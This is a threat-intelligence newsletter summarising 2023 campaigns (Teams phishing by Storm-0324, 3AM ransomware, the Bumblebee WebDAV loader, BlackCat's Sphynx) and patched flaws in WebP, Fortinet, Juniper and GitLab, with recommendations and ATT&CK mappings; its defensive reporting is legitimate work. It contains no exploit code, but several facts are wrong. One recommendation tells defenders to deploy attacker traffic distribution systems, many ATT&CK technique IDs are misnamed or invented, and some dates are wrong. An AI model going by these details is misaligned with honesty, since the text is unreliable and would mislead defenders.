Microsoft Warns of New Phishing Campaign, Bumblebee malware returns in new attacks abusing WebDAV folders, and Fortinet Patches High-Severity Vulnerabilities

At a Glance

Ransomware, Malware & Phishing

1. Microsoft Warns of New Phishing Campaign Targeting Corporations via Teams Messages
2. Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family
3. Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years
4. Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors
5. NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers
6. Retool Falls Victim to SMS-Based Phishing Attack Affecting 27 Cloud Clients
7. Bumblebee malware returns in new attacks abusing WebDAV folders
8. Auckland transport authority hit by suspected ransomware attack
9. BlackCat ransomware hits Azure Storage with Sphynx encryptor

Vulnerabilities

1. Zero-Day Security Vulnerability Found in Chrome, Firefox and Other Browsers 
2. Fortinet Patches High-Severity Vulnerabilities in FortiOS, FortiProxy, FortiWeb Products 
3. 12,000 JUNIPER SRX FIREWALLS AND EX SWITCHES VULNERABLE TO CVE-2023-3684
4. GitLab urges users to install security updates for critical pipeline flaw 

Ransomware, Malware & Phishing

Microsoft Warns of New Phishing Campaign Targeting Corporations via Teams Messages

Analysis: Microsoft has issued a warning regarding a new phishing campaign orchestrated by an initial access broker known as Storm-0324, also referred to as TA543 and Sagrid. This campaign deviates from the norm by utilizing Microsoft Teams messages as the primary vector for infiltrating corporate networks, moving away from traditional email-based infection methods.

Storm-0324's role in this campaign is that of a payload distributor, facilitating the spread of various malicious payloads, including downloaders, banking trojans, ransomware, and modular toolkits.

Access Point recommends the following:

1. Strengthen Email Security: Enhance email security measures to effectively detect and block phishing attempts, especially those involving malicious attachments or links.
2. Implement Traffic Distribution Systems (TDS): Utilize traffic distribution systems like BlackTDS and Keitaro to identify and filter user traffic. These systems enable the evasion of certain security solutions and successful redirection to malicious download sites.
3. Vigilance in Microsoft Teams: Pay close attention to messages received within Microsoft Teams, particularly those containing external links or attachments. Users should exercise caution when encountering such messages.
4. User Education: Educate users about the risks associated with clicking on suspicious links and interacting with potentially harmful attachments.
5. Multi-Factor Authentication (MFA): Require multi-factor authentication for accessing sensitive systems and accounts. MFA provides an additional layer of security, reducing the risk of unauthorized access.
6. Regular Patching: Ensure that security patches and updates are consistently applied to protect against known vulnerabilities that threat actors may exploit.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1566.001 - Spearphishing via Service
• T1566 – Phishing
• T1036 – Masquerading
• T1071 - Application Layer Protocol
• T1105 - Remote File Copy
• T1190 - Exploit Public-Facing Application
• T1563.002 - Remote Service Session Hijacking
• T1059 - Command and Scripting Interpreter

Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family

Analysis: A new ransomware strain known as 3AM has recently emerged, with its first known detection occurring in a single incident where an unidentified affiliate deployed it following an unsuccessful LockBit delivery attempt. The analysis from Symantec's Threat Hunter Team has revealed that 3AM is written in Rust, signifying that it belongs to a completely new malware family.

The 3AM ransomware operates by initially attempting to halt multiple services on the infected computer. It then proceeds to encrypt files and, notably, deletes Volume Shadow Copies (VSS). Encrypted files are marked with the .threeamtime extension. Importantly, the report does not suggest any known affiliations between 3AM and established e-crime groups.

Access Point Recommends the following:

1. Regular Backup of Critical Files: Ensure that critical files are regularly backed up, and that these backups are stored in a secure and isolated location. This practice can facilitate recovery in case of a ransomware incident.
2. Endpoint Security Solutions: Implement advanced endpoint security solutions capable of detecting and preventing malicious activities on individual computers. These solutions play a crucial role in identifying and blocking ransomware threats.
3. Protection for Volume Shadow Copies (VSS): Strengthen protections for Volume Shadow Copies to prevent unauthorized deletion or modification. Preserving VSS copies can be invaluable for data recovery.
4. Network Monitoring: Employ network monitoring tools to detect unusual traffic patterns or communication with malicious servers. Monitoring network traffic can help identify early signs of a ransomware attack.
5. User Account Monitoring: Monitor for unusual user account creations or privilege escalations, as these may indicate an ongoing attack or lateral movement by threat actors.
6. Intrusion Detection Systems (IDS): Utilize intrusion detection systems to identify suspicious activities, especially those related to lateral movement or reconnaissance within your network.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1193 - Spearphishing Attachment  
• T1059 - PowerShell  
• T1073 - DLL Side-Loading  
• T1060 - Registry Run Keys / Startup Folder  
• T1088 - Bypass User Account Control  
• T1027 - Obfuscated Files or Information  
• T1089 - Disabling Security Tools  
• T1003 - Credential Dumping  
• T1012 - Query Registry  
• T1082 - System Information Discovery  
• T1074 - Data Staging  
• T1048 - Exfiltration Over Alternative Protocol  
• T1490 - Inhibit System Recovery  

Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years

Analysis: A concerning supply chain attack recently targeted Linux users via a download manager site, resulting in the distribution of malware that operated covertly for an extended period of over three years. This attack involved the establishment of a reverse shell to an actor-controlled server and the deployment of a Bash stealer on compromised systems. Notably, this campaign was active from 2020 to 2022 but is no longer in operation.

The malware utilized in this attack was designed to gather sensitive data, including system information, browsing history, passwords, cryptocurrency wallet files, and credentials for cloud services.

Access Point recommends the following:

1. Software Source Vetting: Thoroughly vet the reputation and trustworthiness of software sources, particularly those obtained from third-party download sites. Verify the authenticity and integrity of software downloads.
2. Advanced Endpoint Security: Deploy advanced endpoint security solutions capable of detecting and preventing malicious activities on individual computers. These solutions play a critical role in identifying and blocking malware threats.
3. System File Monitoring: Monitor system files and directories for any unauthorized changes, especially in critical areas where tampering can have severe consequences.
4. Network Traffic Analysis: Employ network traffic analysis tools to identify suspicious communication patterns or connections to malicious servers. Timely detection of unusual traffic can help mitigate threats.
5. Intrusion Detection Systems (IDS): Utilize intrusion detection systems to detect anomalies in network traffic and behavior, particularly those indicative of backdoor communication or other malicious activities.
6. Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and has not been tampered with. Detecting unauthorized alterations early is crucial for security.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1105 - Remote File Copy
• T1027 - Obfuscated Files or Information
• T1573 - Encrypted Channel
• T1020 - Automated Exfiltration
• T1059 - Command and Scripting Interpreter
• T1023 - Shortcut Modification: The malware potentially modifies shortcuts to execute malicious files on system startup.

Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors

Analysis: Between February and July 2023, a threat actor group identified as Peach Sandstorm (formerly known as Holmium), associated with the Iranian nation-state, has been actively conducting password spray attacks against multiple global organizations. These organizations primarily operate within the satellite, defense, and pharmaceutical sectors, suggesting a likely motive of gathering intelligence to support Iranian state interests.

Once the threat actors successfully authenticate, they employ a combination of publicly available and custom tools for various activities, including discovery, persistence, lateral movement, and limited data exfiltration.

Access Point recommends the following:

1. Multi-Factor Authentication (MFA): Implement MFA to add an additional layer of security, mitigating the risk of unauthorized access even if passwords are compromised.
2. Password Hygiene: Enforce the use of strong, unique passwords and educate users about the importance of password hygiene. Encourage the use of password managers to generate and securely store complex passwords.
3. Patch and Update Management: Promptly apply security patches and updates to address vulnerabilities in software and systems. Timely patching is critical in preventing exploitation of known vulnerabilities.
4. Network Monitoring: Utilize network monitoring tools to identify unusual or suspicious patterns of activity, particularly during off-hours. Early detection can help mitigate threats before they escalate.
5. Endpoint Detection and Response (EDR): Implement endpoint detection and response solutions to monitor and respond to suspicious activities on endpoints. EDR solutions play a crucial role in threat detection and incident response.
6. Cloud Security: Implement robust cloud security measures and regularly monitor for unauthorized access or unusual behavior within cloud environments. Cloud security is paramount as organizations increasingly migrate to cloud platforms.
7. Threat Intelligence: Stay informed about emerging threats through reputable threat intelligence sources and share threat information within the security community. Collaborative sharing of threat data enhances collective defense efforts.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1110 - Brute Force
• T1056 - Input Capture
• T1003 - Credential Dumping
• T1078 - Valid Accounts
• T1134 - Access Token Manipulation
• T1573 - Encrypted Channel
• T1053 - Scheduled Task/Job

NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers

Analysis: A sustained and concerning campaign is currently targeting Facebook Business accounts through deceptive messages, with the aim of harvesting victims' credentials. This campaign utilizes a variant of the Python-based NodeStealer malware, which has the potential to take control of compromised accounts for subsequent malicious activities. The primary targets of this attack are individuals in Southern Europe and North America, particularly those in the manufacturing services and technology sectors.

NodeStealer, which initially started as JavaScript malware for stealing cookies and passwords, has evolved to compromise accounts on platforms like Facebook, Gmail, and Outlook. The threat actors behind this campaign are believed to be Vietnamese and have recently resumed their activities, possibly adopting tactics used by other adversaries in the region with similar objectives.

Access Point recommends the following:

1. Endpoint Security Solutions: Deploy advanced endpoint security solutions capable of detecting and preventing malicious activities. These solutions play a crucial role in identifying and blocking malware threats.
2. Email and Message Filtering: Employ robust email and message filtering mechanisms to identify and block phishing attempts and malicious attachments. Filtering can help prevent malicious content from reaching users' inboxes.
3. Multi-Factor Authentication (MFA): Require the use of multi-factor authentication for accessing sensitive accounts and systems. MFA adds an extra layer of security by necessitating additional verification beyond passwords.
4. Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and hasn't been tampered with. Detecting unauthorized alterations early is essential for security.
5. Network Traffic Analysis: Utilize network traffic analysis tools to identify unusual or suspicious patterns of activity. Monitoring network traffic can help detect and mitigate threats.
6. Link Validation: Use tools that can analyze and validate links before they are accessed, especially in messages. This can help prevent users from inadvertently visiting malicious websites.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1204 - User Execution
• T1116 - Native API
• T1564.001 - Hidden Files and Directories
• T1053 - Scheduled Task/Job
• T1027 - Obfuscated Files or Information

Retool Falls Victim to SMS-Based Phishing Attack Affecting 27 Cloud Clients

Analysis: Software development company Retool recently disclosed a significant security breach affecting 27 of its cloud customers. The breach, which took place on August 27, 2023, was the result of a targeted SMS-based social engineering attack. Retool identified a Google Account cloud synchronization feature introduced in April 2023 as a contributing factor to the severity of the breach. This feature inadvertently transformed multi-factor authentication (MFA) into single-factor authentication, amplifying the impact of the incident.

It is crucial to emphasize that the breach was initiated through a successful SMS phishing attack that impersonated an IT team member. The attackers convincingly tricked an employee into clicking on a seemingly legitimate link, ostensibly to address a payroll-related issue. This led the employee to a fraudulent landing page, where they unknowingly divulged their login credentials.

The attackers then escalated their attack by calling the employee, using a deepfake to mimic the voice of an IT team member. During this call, they obtained the MFA code, which allowed them to gain control over the employee's Okta account. With this access, the attackers generated their own MFA codes, ultimately establishing an active Google Workspace session on their device.

The compromise of Google Authenticator's cloud sync feature played a critical role in enabling the attackers to gain elevated access to internal admin systems. This escalation resulted in the takeover of accounts belonging to 27 customers within the crypto industry. Subsequently, the attackers changed the affected users' email addresses and reset their passwords, leading to the theft of approximately $15 million worth of cryptocurrency from one impacted user, Fortress Trust.

Access Point recommends the following:

1. MFA Monitoring and Security: Regularly monitor and enhance the security of multi-factor authentication (MFA) systems. Ensure that MFA remains a robust layer of defense against unauthorized access.
2. Phishing Awareness: Conduct ongoing training and simulations to raise awareness about the dangers of phishing, emphasizing vigilance in recognizing and reporting suspicious messages and links.
3. Incident Response Planning: Develop and maintain a robust incident response plan to swiftly mitigate the impact of security breaches. This plan should include procedures for handling social engineering attacks and unauthorized access.
4. Authentication System Audits: Periodically audit and assess the security of authentication systems, especially those involving cloud synchronization features. Ensure that security controls are in place to prevent compromise.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1192 - SMS Phishing  
• T1565.001 - Deepfake Technology Exploitation  

Bumblebee malware returns in new attacks abusing WebDAV folders

Analysis: The malware loader known as 'Bumblebee' has reemerged after a two-month hiatus, launching a fresh campaign with novel distribution tactics centered around exploiting 4shared WebDAV services. WebDAV, an extension of HTTP, allows for remote authoring operations, enabling clients to create, access, update, and delete web server content. Starting on September 7, 2023, the latest Bumblebee campaign leverages 4shared WebDAV services to disseminate the loader, conduct the attack sequence, and execute post-infection activities. By manipulating the reputable 4shared platform, Bumblebee operators can evade blocklists and maintain high infrastructure availability. Simultaneously, the WebDAV protocol provides multiple avenues to bypass behavioral detection systems, granting an advantage in distribution and payload management.

The current Bumblebee campaign relies on malspam emails camouflaged as scans, invoices, and notifications to lure recipients into downloading malicious attachments. These attachments mainly consist of Windows shortcut LNK files, with some ZIP archives containing LNK files, indicating ongoing experimentation by Bumblebee operators to refine their tactics. When the LNK file is opened, a series of commands are executed on the victim's machine. This includes mounting a WebDAV folder on a network drive using hardcoded credentials for a 4shared storage account. The 4shared platform permits users to store and access files through WebDAV, FTP, and SFTP, although it was previously listed in the US government's 2016 Notorious Markets report for hosting copyrighted content.

An updated version of the Bumblebee malware loader has been identified in this campaign. It has shifted from using the WebSocket protocol to TCP for command and control server (C2) communications. Additionally, the new loader incorporates a domain generation algorithm (DGA) that generates 100 domains on the ".life" top-level domain (TLD) space upon execution. This DGA implementation complicates efforts to map Bumblebee's infrastructure, block its domains, and disrupt its operations, making it more challenging to implement preventive measures against the malware loader.

Access Point recommends the following:

1. Email Security and User Training: Implement robust email filtering solutions to identify and block suspicious emails. Continuously educate users to recognize and avoid opening attachments or clicking on links in unsolicited or suspicious emails.
2. Network and Endpoint Security: Deploy strong network and endpoint security solutions capable of detecting and blocking malicious attachments and web connections. These solutions are pivotal in identifying and mitigating threats at various stages of an attack.
3. Monitoring for WebDAV Activity: Regularly monitor network traffic for unusual WebDAV activity and network drive mounting. Detection of such activity can provide early indicators of potential threats and enable a swift response.
4. Threat Intelligence and Patching: Stay informed about emerging threats by maintaining up-to-date threat intelligence. Promptly apply security patches and measures recommended by trusted sources to address known vulnerabilities.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1193.001 - Spearphishing Attachment  
• T1059.003 - Command-Line Interface  
• T1140.001 - Deobfuscate/Decode Files or Information  
• T1036.008 - Masquerading File Type  
• T1092.002 - Domain Generation Algorithms  

Auckland transport authority hit by suspected ransomware attack

Analysis: The Auckland Transport (AT) transportation authority in New Zealand is currently dealing with a significant outage resulting from a cyber incident, affecting a wide range of customer services. AT is the government-owned entity responsible for overseeing public transport, including ferries, buses, trains, and infrastructure development.

The incident has had a notable impact on AT's HOP services, which include the integrated ticketing and fares system. Various HOP card services, including top-ups, have been affected. Despite these disruptions, AT has assured passengers that they can still travel, even if their HOP cards cannot be immediately topped up. AT has provided an update stating that they suspect ransomware involvement in the incident, but investigations are still ongoing.

Passengers with empty HOP cards are being offered leniency, and the overall travel using AT's services remains unaffected. AT expects that its website and HOP services may return to normal early next week and has requested patience during the gradual restoration process. While concerns about potential data exposure exist due to the nature of ransomware attacks, AT has stated that they believe the incident is confined to one system segment, and no personal or financial data has been accessed.

Access Point recommends the following:

1. Robust Cybersecurity Measures: Ensure the implementation of robust cybersecurity measures, including regular data backups, continuous network monitoring, and updated security protocols to safeguard against cyber threats.
2. Employee Education: Educate employees and users about phishing threats and promote cyber hygiene practices to mitigate the risk of falling victim to such attacks.
3. Incident Response Plan: Establish a comprehensive response plan for handling cyber incidents. This plan should encompass communication strategies, backup systems, and a well-defined incident response team.
4. Security Audits and Vulnerability Assessments: Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses in the organization's cybersecurity infrastructure.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1078 - Valid Accounts
• T1486 - Data Encrypted for Impact
• T1490 - Inhibit System Recovery
• T1565 - Data Manipulation

BlackCat ransomware hits Azure Storage with Sphynx encryptor  

Analysis: The BlackCat (ALPHV) ransomware gang has evolved its tactics, now employing stolen Microsoft accounts and a new encryptor called Sphynx to target Azure cloud storage. During a breach investigation, Sophos X-Ops incident responders discovered that the attackers leveraged a new variant of Sphynx, incorporating support for custom credentials.

The attackers gained unauthorized access to a Sophos Central account, disabled Tamper Protection, and modified security policies using a stolen One-Time Password (OTP) acquired from the victim's LastPass vault through the LastPass Chrome extension. Subsequently, they encrypted the victim's systems and remote Azure cloud storage, appending the .zk09cvt extension to locked files. In total, the ransomware operators successfully encrypted 39 Azure Storage accounts. They accessed the victim's Azure portal using a stolen Azure key, granting them entry to the targeted storage accounts. The keys were injected into the ransomware binary after being encoded with Base64.

The attackers also utilized various Remote Monitoring and Management (RMM) tools such as AnyDesk, Splashtop, and Atera throughout the intrusion. The Sphynx variant, discovered by Sophos in March 2023, was found to embed the Remcom hacking tool and the Impacket networking framework, enabling lateral movement across compromised networks.

BlackCat, formerly known as DarkSide, gained notoriety after breaching Colonial Pipeline in November 2021. Suspected to be a rebrand of DarkSide/BlackMatter, the group has consistently targeted global enterprises with refined and sophisticated tactics. They have adopted new extortion methods and introduced a data leak API to streamline the dissemination of stolen data. Recently, an affiliate of the gang claimed responsibility for an attack on MGM Resorts, encrypting over 100 ESXi hypervisors after the company took down its internal infrastructure and refused ransom negotiations. The FBI issued a warning in April, attributing the group to successful breaches of over 60 entities worldwide between November 2021 and March 2022.

Access Point recommends the following:

1. Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security, especially for critical accounts and systems.
2. Advanced Endpoint Security: Employ advanced endpoint security solutions to detect and prevent malicious activities on individual computers.
3. Email and Message Filtering: Utilize email and message filtering to identify and block phishing attempts and malicious attachments.
4. Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and hasn't been tampered with.
5. Network Traffic Analysis: Use network traffic analysis tools to identify unusual or suspicious patterns of activity.
6. Cloud Security: Implement robust cloud security measures and monitor for unauthorized access or unusual behavior in cloud environments.

MITRE ATT&CK Technique Numbers associated with this campaign include:

• T1078 - Valid Accounts
• T1116 - Native API
• T1564.001 - Hidden Files and Directories
• T1053 - Scheduled Task/Job
• T1027 - Obfuscated Files or Information
• T1573 - Encrypted Channel
• T1059 - Command and Scripting Interpreter
• T1573.001 - Symmetric Cryptography

Vulnerabilities

Zero-Day Security Vulnerability Found in Chrome, Firefox and Other Browsers 

Analysis: A zero-day vulnerability affecting major web browsers, including Google Chrome, Mozilla's Firefox, Thunderbird, Microsoft Edge, the Brave browser, and the Tor Browser, has been highlighted. This vulnerability originates in the WebP Codec, a widely used component for rendering WebP images. Attackers could exploit a heap buffer overflow in WebP to execute malicious code, potentially leading to data theft or malware infection on the victim's machine.

Further investigations have revealed that the vulnerability extends beyond browsers to impact various applications, including Affinity, Gimp, Inkscape, LibreOffice, Telegram, numerous Android apps, cross-platform apps made with Flutter, and applications built on the Electron framework. The heap buffer overflow allows attackers to inject malicious code by exceeding the data buffer limits of a program.

Several major browser providers, including Google, Mozilla, Brave, Microsoft, and Tor, have addressed this vulnerability by rolling out security patches. Users of these browsers are urged to update to the latest versions to protect their systems.

For other affected applications where patches may not yet be available, users are advised to exercise caution when using the application or consider temporarily discontinuing its use. Regularly monitoring updates and advisories from software providers is essential to stay informed about the availability of patches.

Access Point recommends the following:

1. Update Browsers: Users of impacted web browsers should immediately update them to the latest versions that include patches for the vulnerability.
2. Check Application Updates: Users of affected applications should check for and apply available security updates. If patches are not yet available, exercise caution or consider temporary discontinuation of the application's use.
3. Stay Informed: Regularly monitor updates and advisories from software providers to stay informed about the availability of patches and security recommendations.

Fortinet Patches High-Severity Vulnerabilities in FortiOS, FortiProxy, FortiWeb Products 

Analysis: Fortinet has unveiled patches for a high-severity cross-site scripting (XSS) vulnerability that affects multiple versions of FortiOS and FortiProxy. The vulnerability, designated as CVE-2023- 29183 with a CVSS score of 7.3, can potentially allow a malicious authenticated individual to execute harmful JavaScript code through specially designed guest management settings. This flaw, detected by the Fortinet CSE team, is present in FortiProxy versions 7.0.x and 7.2.x and FortiOS versions ranging from 6.2.x to 7.4.x.

In response, Fortinet has issued updates for these versions to rectify the problem.  Additionally, Fortinet has also addressed a significant vulnerability in its FortiWeb product, a web application firewall and API protection solution. This vulnerability, known as CVE-2023- 34984 with a CVSS score of 7.1, can enable threat actors to circumvent XSS and CSRF protection mechanisms. The issue affects FortiWeb versions 6.3, 6.4, 7.0.x, and 7.2.x. As a remedy, Fortinet has rolled out FortiWeb versions 7.0.7 and 7.2.2.  Though Fortinet hasn't reported any real- world exploits related to these vulnerabilities, past security issues in Fortinet devices have been utilized by attackers to infiltrate corporate networks. Due to the potential severity of these vulnerabilities, the US Cybersecurity and Infrastructure Security Agency (CISA) has alerted organizations that cybercriminals could exploit these vulnerabilities to gain full control over affected systems.

Access Point recommends the following:

1. Check for Updates: We strongly encourages administrators to peruse Fortinet's official advisories and promptly apply the essential security patches.  

12,000 JUNIPER SRX FIREWALLS AND EX SWITCHES VULNERABLE TO CVE-2023-3684

Analysis: Researchers have identified approximately 12,000 internet-accessible Juniper SRX firewalls and EX switches that are vulnerable to a remote code execution flaw known as CVE-2023-36845. In mid-August, Juniper addressed this and three other medium-severity vulnerabilities (CVE-2023-36844, CVE-2023-36846, and CVE-2023-36847) affecting the J-Web component of Juniper Networks Junos OS on SRX Series and EX Series devices. Juniper's advisory warns that attackers could potentially exploit these vulnerabilities in a sequence to achieve remote code execution on affected devices. Specifically, an attacker can upload arbitrary files via J-Web, which can lead to further vulnerabilities.

In August, security researchers demonstrated a proof-of-concept exploit code showcasing how an attacker could exploit these vulnerabilities on Juniper SRX firewalls for remote code execution. This process involves chaining two vulnerabilities: first, exploiting a pre-authentication upload vulnerability (CVE-2023-36846) to upload a PHP file, and subsequently exploiting CVE-2023-36845 to overwrite a specific environment variable, triggering the execution of the uploaded PHP file. The researchers emphasized the severity of this vulnerability combination, as it could have significant implications for networks, given the central role of JunOS devices.

VulnCheck has developed an alternative exploit specific to CVE-2023-36845. This exploit differs from the previous one in that it doesn't involve creating a file on the system and can be executed using a single cURL command, impacting older versions. It takes advantage of how Juniper firewalls' Appweb web server interacts with CGI scripts, allowing an attacker to introduce a system "file" and manipulate environment variables to execute code.

Around 80% of the affected firewalls exposed to the internet were found using the Shodan search engine. This discovery revealed roughly 15,000 vulnerable Juniper devices with internet-facing web interfaces. Given the critical role of firewalls in network security, unpatched Juniper firewalls could be attractive targets for advanced persistent threats (APTs).

Access Point recommends the following:

1. Immediate Patching: Promptly apply the necessary security patches provided by Juniper for the identified vulnerabilities, especially CVE-2023-36845, to prevent potential exploitation.
2. Continuous Monitoring: Implement continuous monitoring of your Juniper devices for any signs of system compromise or suspicious activities.

GitLab urges users to install security updates for critical pipeline flaw 

Analysis: GitLab, a widely-used web-based open-source software project management and work tracking platform, has issued security updates to address a critical vulnerability identified as CVE-2023-4998, with a CVSS v3.1 score of 9.6. This vulnerability impacts both GitLab Community Edition (CE) and Enterprise Edition (EE) versions 13.12 through 16.2.7, as well as versions 16.3 through 16.3.4. The flaw, discovered by security researcher Johan Carlsson, enables attackers to impersonate users and execute pipelines on their behalf through scheduled security scan policies.

This vulnerability represents a more severe bypass of an earlier medium-severity issue, CVE-2023-3932, which was resolved in August. When exploited, attackers can gain access to sensitive information, use the victim's permissions to execute code, alter data, or initiate specific events within GitLab. Given GitLab's critical role in code management, exploiting this vulnerability could lead to the theft of intellectual property, data breaches, supply chain attacks, and other significant threats.

GitLab has strongly urged users to promptly update their software to the fixed versions, which are GitLab Community Edition and Enterprise Edition 16.3.4 and 16.2.7. As a preventive measure, users operating on versions earlier than 16.2 should take action immediately, as these versions have not been patched.

Access Point recommends the following:

1. Apply Security Updates: Promptly update your GitLab software to the fixed versions, specifically GitLab Community Edition and Enterprise Edition 16.3.4 and 16.2.7, to mitigate the risk associated with CVE-2023-4998.
2. Immediate Action for Unpatched Versions: If you are using GitLab versions earlier than 16.2 and have not applied patches, take immediate action to protect your system from potential exploitation.
3. Source Updates from Official Channels: Ensure that you source updates directly from GitLab or access GitLab Runner packages from the platform's official webpage to guarantee their authenticity and security.
4. Mitigate Feature Interaction: If you are using both "CI/CD pipeline triggers" and "Security policies" concurrently, consider enabling these features one by one to avoid potential exposure to vulnerabilities.

‍